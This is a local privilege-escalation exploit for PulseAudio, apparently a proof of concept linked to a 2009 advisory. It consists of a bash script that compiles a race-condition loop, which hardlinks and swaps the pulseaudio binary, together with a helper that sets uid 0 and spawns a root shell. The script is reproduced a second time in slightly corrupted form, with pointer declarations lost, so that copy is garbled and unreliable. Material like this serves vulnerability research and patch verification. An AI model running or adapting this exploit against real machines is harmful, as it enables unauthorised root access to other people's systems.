PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)

## pa_race.sh
#!/bin/bash

pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`

trap cleanup INT

function cleanup()
{
	rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
	rm -rf $workdir/PATMP*
}

cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PULSEAUDIO_PATH		"$pulseaudio"
#define SH_PATH			"$workdir/sh"
#define TMPDIR_TEMPLATE		"$workdir/PATMPXXXXXX"

void _pause(long sec, long usec);

int main(int argc, char *argv[], char *envp[])
{
	int   status;
	pid_t pid;
	char  template[sizeof(TMPDIR_TEMPLATE)];
	char *tmpdir;
	char  hardlink[sizeof(template) + 2];
	char  hardlink2[sizeof(template) + 12];

	srand(time(NULL));

	for( ; ; )
	{
		snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
		template[sizeof(template) - 1] = '\0';

		tmpdir = mkdtemp(template);
		if(tmpdir == NULL)
		{
			perror("mkdtemp");
			return 1;
		}

		snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
		hardlink[sizeof(hardlink) - 1] = '\0';

		snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
		hardlink2[sizeof(hardlink2) - 1] = '\0';

		/* this fails if $workdir is a different partition */
		if(link(PULSEAUDIO_PATH, hardlink) == -1)
		{
			perror("link");
			return 1;
		}

		if(link(SH_PATH, hardlink2) == -1)
		{
			perror("link");
			return 1;
		}

		pid = fork();

		if(pid == 0)
		{
			char *argv[] = {hardlink, NULL};
			char *envp[] = {NULL};

			execve(hardlink, argv, envp);

			perror("execve");
			return 1;
		}

		if(pid == -1)
		{
			perror("fork");
			return 1;
		}
		else
		{
			/* tweak this if exploit does not work */
			_pause(0, rand() % 500);

			if(unlink(hardlink) == -1)
			{
				perror("unlink");
				return 1;
			}

			if(link(SH_PATH, hardlink) == -1)
			{
				perror("link");
				return 1;
			}
			waitpid(pid, &status, 0);
		}

		if(unlink(hardlink) == -1)
		{
			perror("unlink");
			return 1;
		}

		if(unlink(hardlink2) == -1)
		{
			perror("unlink");
			return 1;
		}

		if(rmdir(tmpdir) == -1)
		{
			perror("rmdir");
			return 1;
		}
	}

	return 0;
}

void _pause(long sec, long usec)
{
	struct timeval timeout;

	timeout.tv_sec  = sec;
	timeout.tv_usec = usec;

	if(select(0, NULL, NULL, NULL, &timeout) == -1)
	{
		perror("select");
	}
}
__EOF__

cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


int main(int argc, char *argv[], char *envp[])
{
	if(geteuid() != 0)
	{
		return 1;
	}

	setuid(0);
	setgid(0);

	if(fork() == 0)
	{
		argv[0] = "$id";
		argv[1] = NULL;
		execve(argv[0], argv, envp);
		return 1;
	}

	argv[0] = "$shell";
	argv[1] = NULL;
	execve(argv[0], argv, envp);
	return 1;
}
__EOF__

gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c

$workdir/pa_race
	#!/bin/bash

	pulseaudio=`which pulseaudio`
	workdir="/tmp"
	#workdir=$HOME
	id=`which id`
	shell=`which sh`

	trap cleanup INT

	function cleanup()
	{
	rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
	rm -rf $workdir/PATMP*
	}

	cat > $workdir/pa_race.c << __EOF__
	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <time.h>
	#include <sys/types.h>
	#include <sys/wait.h>

	#define PULSEAUDIO_PATH "$pulseaudio"
	#define SH_PATH "$workdir/sh"
	#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"

	void _pause(long sec, long usec);

	int main(int argc, char argv[], char envp[])
	{
	int status;
	pid_t pid;
	char template[sizeof(TMPDIR_TEMPLATE)];
	char *tmpdir;
	char hardlink[sizeof(template) + 2];
	char hardlink2[sizeof(template) + 12];

	srand(time(NULL));

	for( ; ; )
	{
	snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
	template[sizeof(template) - 1] = '\0';

	tmpdir = mkdtemp(template);
	if(tmpdir == NULL)
	{
	perror("mkdtemp");
	return 1;
	}

	snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
	hardlink[sizeof(hardlink) - 1] = '\0';

	snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
	hardlink2[sizeof(hardlink2) - 1] = '\0';

	/* this fails if $workdir is a different partition */
	if(link(PULSEAUDIO_PATH, hardlink) == -1)
	{
	perror("link");
	return 1;
	}

	if(link(SH_PATH, hardlink2) == -1)
	{
	perror("link");
	return 1;
	}

	pid = fork();

	if(pid == 0)
	{
	char *argv[] = {hardlink, NULL};
	char *envp[] = {NULL};

	execve(hardlink, argv, envp);

	perror("execve");
	return 1;
	}

	if(pid == -1)
	{
	perror("fork");
	return 1;
	}
	else
	{
	/* tweak this if exploit does not work */
	_pause(0, rand() % 500);

	if(unlink(hardlink) == -1)
	{
	perror("unlink");
	return 1;
	}

	if(link(SH_PATH, hardlink) == -1)
	{
	perror("link");
	return 1;
	}
	waitpid(pid, &status, 0);
	}

	if(unlink(hardlink) == -1)
	{
	perror("unlink");
	return 1;
	}

	if(unlink(hardlink2) == -1)
	{
	perror("unlink");
	return 1;
	}

	if(rmdir(tmpdir) == -1)
	{
	perror("rmdir");
	return 1;
	}
	}

	return 0;
	}

	void _pause(long sec, long usec)
	{
	struct timeval timeout;

	timeout.tv_sec = sec;
	timeout.tv_usec = usec;

	if(select(0, NULL, NULL, NULL, &timeout) == -1)
	{
	perror("select");
	}
	}
	__EOF__

	cat > $workdir/sh.c << __EOF__
	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <sys/types.h>


	int main(int argc, char argv[], char envp[])
	{
	if(geteuid() != 0)
	{
	return 1;
	}

	setuid(0);
	setgid(0);

	if(fork() == 0)
	{
	argv[0] = "$id";
	argv[1] = NULL;
	execve(argv[0], argv, envp);
	return 1;
	}

	argv[0] = "$shell";
	argv[1] = NULL;
	execve(argv[0], argv, envp);
	return 1;
	}
	__EOF__

	gcc -o $workdir/pa_race $workdir/pa_race.c
	gcc -o $workdir/sh $workdir/sh.c

	$workdir/pa_race